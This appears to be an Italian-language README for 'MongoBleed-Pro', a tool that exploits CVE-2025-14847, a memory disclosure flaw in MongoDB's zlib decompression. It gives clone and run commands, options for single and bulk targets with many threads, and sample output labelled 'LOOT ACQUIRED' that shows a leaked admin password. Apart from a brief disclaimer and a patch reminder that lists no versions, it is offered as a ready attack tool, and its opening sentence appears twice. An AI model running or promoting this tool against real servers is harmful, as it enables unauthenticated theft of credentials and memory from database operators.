
una vulnerabilità critica di divulgazione della memoria nella gestione della compressione zlib di MongoDB. Questo strumento consente ai ricercatori di sicurezza di estrarre dati sensibili da istanze MongoDB vulnerabili.
Strumento avanzato per lo sfruttamento delle perdite di memoria di MongoDB
Continua ad imparare | Continua a hackerare con CyberTechAjju
MongoBleed-Pro è uno strumento di sfruttamento avanzato per CVE-2025-14847, una vulnerabilità critica di divulgazione della memoria nella gestione della compressione zlib di MongoDB. Questo strumento consente ai ricercatori di sicurezza di estrarre dati sensibili da istanze MongoDB vulnerabili.
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Ottenere sempre la dovuta autorizzazione prima di effettuare test.
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| File | Descrizione |
|---|---|
loot_<host>.txt | Segreti estratti in formato leggibile |
dump_<host>.bin | Dump di memoria grezzo per analisi manuale |
Se sei un amministratore MongoDB, aggiorna alle versioni corrette:
CyberTechAjju
Questo progetto è concesso in licenza MIT - vedi il file LICENSE per i dettagli.
Se hai trovato utile questo strumento, per favore dagli una ⭐ su GitHub!
「 Continua ad imparare | Continua a hackerare 」
Realizzato con ❤️ da CyberTechAjju
| Proprietà | Dettagli |
|---|
| CVE ID | CVE-2025-14847 |
| Tipo di Vulnerabilità | Divulgazione di Memoria |
| Versioni Interessate | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Causa Principale | Lettura eccessiva del buffer nella decompressione zlib |
| Impatto | Perdita di memoria remota non autenticata |
| Argomento | Descrizione | Predefinito |
|---|
--target | IP/URL del target | Richiesta interattiva |
--file | File con elenco di target | Nessuno |
--threads | Numero di thread | 50 |
--min-offset | Offset minimo di memoria | 20 |
--max-offset | Offset massimo di memoria | 8192 |